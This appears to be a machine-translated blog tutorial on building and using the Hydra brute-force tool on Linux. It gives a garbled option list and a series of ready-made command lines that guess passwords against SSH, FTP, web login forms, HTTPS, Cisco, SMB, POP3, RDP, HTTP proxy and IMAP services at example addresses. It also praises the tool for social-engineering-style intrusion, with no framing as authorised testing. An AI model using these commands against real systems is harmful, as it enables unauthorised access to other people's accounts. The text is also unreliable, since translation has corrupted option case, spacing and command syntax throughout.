Linux Brute force hack tool Hydra

Install Brute force hack tool

# yum Install CMake

# CD/USR/LOCAL/SRC

# wget http://www.libssh.org/files/0.4/libssh-0.4.8.tar.gz

# tar zxf libssh-0.4.8.tar.gz

# CD libssh-0.4.8

# mkdir Build

# CD Build

# Cmake-dcmake_install_prefix=/usr-dcmake_build_type=debug-dwith_ssh1=on.

# make

# make Install

#/sbin/ldconfig//To execute this sentence, otherwise it will appear hydra:error while loading shared libraries:libssh.so.4:cannot open Shared object file:n o Such file or directory

# CD/USR/LOCAL/SRC

# wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz

# tar zxf hydra-6.3-src.tar.gz

# CD HYDRA-6.3-SRC

#./configure

# make

# make Install

#########################################

Hydra [[[-L LOGIN|-L file] [-P pass|-p file] | [-c FILE]] [-e NS]

[-O FILE] [-T TASKS] [-M FILE [-t TASKS]] [-W Time] [-F] [-S PORT] [-S] [-VV] Server service [OPT]

-R continues to crack from the last progress.

-S uses SSL links.

-S port allows you to specify a nondefault port with this parameter.

-L LOGIN Specifies the cracked user to crack for a specific user.

-L FILE Specifies the user name dictionary.

-P PASS Lowercase, specify password cracking, less use, usually using a password dictionary.

-P FILE Uppercase, specifying the password dictionary.

-e ns Optional option, N: null password heuristic, s: Use specified user and password heuristics.

-C FILE uses a colon-delimited format, such as "Login: password" instead of the-l/-p parameter.

-m file specifies a single line of target list files.

-o file specifies the result output files.

-F after using the-m parameter, find the first pair of login or password to stop the crack.

The number of threads running concurrently with-T TASKS, which defaults to 16.

-W time sets the maximum timeout, in seconds, which is 30s by default.

-V/-V displays detailed procedures.

Server Destination IP

Service name, supported services and protocols: Telnet FTP POP3[-NTLM] IMAP[-NTLM] SMB smbnt http-{head|get} http-{get|post}-form http-proxy Cisco cisco-enable VNC ldap2 ldap3 MSSQL mysql oracle-listener postgres NNTP socks5 rexec rlogin pcnfs SNMP rsh CVS svn ic Q sapr3 ssh SMTP-AUTH[-NTLM] pcanywhere teamspeak SIP VMAUTHD Firebird NCP AFP et cetera.

opt selectable options

################################################

1. hack ssh:

# hydra-l users.txt-p password.txt-t 1-vv-e ns 192.168.1.8 SSH

Crack success, direct display results. You can also specify the result output file using the-o option.

# hydra-l users.txt-p password.txt-t 1-vv-e ns-o save.log 192.168.1.104 ssh

1. hack ssh:

# hydra-l User name-p password Dictionary-t thread-vv-e NS IP SSH

# hydra-l User name-p password Dictionary-t thread-o save.log-vv IP ssh

2. hack ftp:

# Hydra IP ftp-l user name-p password Dictionary-t thread (default)-VV

# Hydra IP ftp-l user name-p password Dictionary-e ns-vv

3.get way to commit, hack Web login:

# hydra-l User name-p password Dictionary-t thread-vv-e NS IP http-get/admin/

# hydra-l User name-p password Dictionary-t thread-vv-e ns-f IP http-get/admin/index.php

4.post way to commit, hack Web login:

# hydra-l User name-p password Dictionary-s-IP http-post-form "/admin/login.php:username=^user^&password=^pass^&submit=login: Sorry password "

# hydra-t 3-l admin-p pass.txt-o out.txt-f 10.36.16.18 http-post-form "Login.php:id=^user^&passwd=^pass^:wrong US Ername or password "

(parameter description:-T simultaneous thread number 3,-L username is admin, dictionary pass.txt, save as Out.txt,-f when cracked a password on stop, 10.36.16.18 target IP, Http-post-form means that the hack is a form password cracking,<title> that is submitted using the HTTP POST method, which is the return information hint that represents the error guess. ）

5. hack https:

# hydra-m/index.php-l muts-p pass.txt 10.36.16.18 HTTPS

6. Crack TeamSpeak:

# hydra-l User name-p password Dictionary-s port number-VV IP teamspeak

7. hack Cisco:

# hydra-p Pass.txt 10.36.16.18 Cisco

# hydra-m cloud-p pass.txt 10.36.16.18 cisco-enable

8. Crack SMB:

# hydra-l administrator-p pass.txt 10.36.16.18 SMB

9. Crack POP3:

# hydra-l muts-p pass.txt my.pop3.mail POP3

10. hack RDP:

# Hydra IP rdp-l administrator-p pass.txt-v

11. Crack Http-proxy:

# hydra-l Admin-p pass.txt http-proxy://10.36.16.18

12. hack IMAP:

# HYDRA-L USER.TXT-P Secret 10.36.16.18 IMAP PLAIN

# hydra-c Defaults.txt-6 Imap://[fe80::2c:31ff:fe12:ac11]:143/plain

This tool is far more powerful than the above test, its password can be cracked key lies in a powerful dictionary, for social work-type infiltration, sometimes can get a multiplier effect

This article is from the "believe it or not you" blog, please be sure to keep this source http://312461613.blog.51cto.com/965442/1601226

Brute Force hack tool Hydra under Linux